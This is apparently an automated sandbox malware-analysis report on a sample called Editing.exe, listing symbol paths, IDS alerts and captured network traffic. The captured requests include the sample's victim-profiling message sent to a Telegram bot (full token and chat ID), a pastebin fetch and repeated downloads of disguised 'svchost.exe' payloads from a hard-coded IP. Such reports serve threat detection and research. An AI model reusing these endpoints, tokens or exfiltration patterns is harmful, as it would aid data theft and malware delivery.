Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Editing.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Editing.exe, 00000000.00000002.3211317727.0000024437D40000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211294592.0000024437D31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdb source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:51668 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:51881 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:51882 -> 149.154.167.220:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: global trafficTCP traffic: 192.168.2.6:51658 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: GET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1Host: api.telegram.org
Source: global trafficHTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 136
Source: global trafficHTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 136
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: ip-api.com
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51663 -> 208.95.112.1:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49778 -> 172.67.74.152:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51682 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51681 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51811 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51810 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51875 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51879 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51880 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51876 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49706 -> 104.20.3.235:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51668 -> 149.154.167.220:443
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 136
Source: Editing.exeString found in binary or memory: http://.css
Source: Editing.exeString found in binary or memory: http://.jpg
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exe
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32s
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/TeamBuild/win64_svchost.exe
Source: Editing.exe, 00000000.00000002.3211502508.000002443A87A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214:80/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3211502508.000002443A8A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org:443/
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://exslt.org/common
Source: Editing.exeString found in binary or memory: http://html4/loose.dtd
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3211502508.000002443A80B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8
Source: Editing.exe, 00000000.00000002.3211502508.000002443A80B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
Source: Editing.exe, 00000000.00000003.2461137442.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2986571369.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198834558.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2460845546.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2728016609.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2985277080.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198606604.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198401533.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216305101.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000002.00000002.2224756243.000002B11B271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2269834300.0000020A726D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2191077266.0000020A63AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213329028.00000284CD5B0000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
